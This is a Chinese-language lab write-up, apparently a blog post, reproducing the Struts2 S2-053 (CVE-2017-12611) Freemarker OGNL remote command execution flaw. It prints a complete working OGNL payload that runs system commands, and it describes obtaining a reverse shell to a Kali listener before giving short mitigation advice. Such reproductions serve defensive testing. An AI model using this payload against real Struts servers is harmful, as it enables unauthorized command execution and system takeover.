Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
2019-07-17 23:43
1406 查看
Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
一、漏洞描述
Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。
二、漏洞影响版本
Struts 2.0.1-struts 2.3.33
Struts 2.5-Struts 2.5.10
三、漏洞环境搭建
1.使用docker搭建环境
四、漏洞复现
1、启动环境
2、浏览器访问
POC如下:
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} 注: 执行命令的地方在于(#cmd=’id’)
3、查看用户所属组
4、反弹shell,把shell反弹到kali上
5、在kali 端开启监听,可以看到成功获得目标反弹过来的shell
五、漏洞防御
1、 Apache Struts版本最新版本
2、 Freemarker标签不要通过Request方式获取
相关文章推荐
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- 【S2-052】Struts2远程命令执行漏洞(CVE-2017-9805)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- 【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
- CVE-2017-8464远程命令执行漏洞复现
- 【漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
- 网站安全加固之apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
- 9.漏洞验证系列--Apache Struts2 远程命令执行(S2-045)
- CVE-2017-8464 远程命令执行漏洞复现
- Apache Struts2 includeParams属性远程命令执行漏洞(CVE-2013-1966)
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- struts2远程命令执行漏洞S2-045
- iis6.0远程代码执行漏洞复现(CVE-2017-7269)
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- Struts2远程命令执行漏洞 S2-045 源码分析